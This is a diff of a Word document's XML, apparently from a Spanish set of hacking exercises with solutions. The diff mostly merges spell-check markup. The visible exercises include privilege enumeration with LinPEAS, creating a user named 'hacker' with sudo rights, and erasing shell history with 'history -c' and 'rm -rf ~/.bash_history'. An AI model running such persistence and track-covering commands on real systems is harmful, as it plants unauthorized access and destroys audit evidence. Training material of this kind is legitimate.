+          <v:rect id="_x0000_i1105" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -3799,15 +3704,7 @@
       </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">Comprueba si puedes ejecutar comandos como </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>root</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t>Comprueba si puedes ejecutar comandos como root.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3840,41 +3737,31 @@
     <w:p>
       <w:r>
         <w:pict w14:anchorId="34CD47C8">
-          <v:rect id="_x0000_i1698" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">97. Enumeración automática con </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>LinPEAS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <v:rect id="_x0000_i1106" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>97. Enumeración automática con LinPEAS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>Enunciado:</w:t>
       </w:r>
       <w:r>
@@ -3892,13 +3779,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chmod</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> +x linpeas.sh</w:t>
+      <w:r>
+        <w:t>chmod +x linpeas.sh</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -3921,7 +3803,7 @@
     <w:p>
       <w:r>
         <w:pict w14:anchorId="42478059">
-          <v:rect id="_x0000_i1699" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1107" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -3959,23 +3841,14 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Solución</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>:</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Solución:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4007,7 +3880,7 @@
     <w:p>
       <w:r>
         <w:pict w14:anchorId="4C13B51E">
-          <v:rect id="_x0000_i1700" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1108" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -4050,47 +3923,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>useradd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> hacker</w:t>
+        <w:t>sudo useradd hacker</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>passwd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> hacker</w:t>
+        <w:t>sudo passwd hacker</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>usermod</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aG</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> sudo hacker</w:t>
+        <w:t>sudo usermod -aG sudo hacker</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4109,7 +3950,7 @@
     <w:p>
       <w:r>
         <w:pict w14:anchorId="2B18111F">
-          <v:rect id="_x0000_i1701" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1109" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -4147,36 +3988,25 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Solución</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Solución:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
         <w:t>history -c</w:t>
       </w:r>
       <w:r>
@@ -4184,21 +4014,13 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
         <w:br/>
-        <w:t>rm -rf ~/.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>bash_history</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>rm -rf ~/.bash_history</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="5555A834">
-          <v:rect id="_x0000_i1702" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1110" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
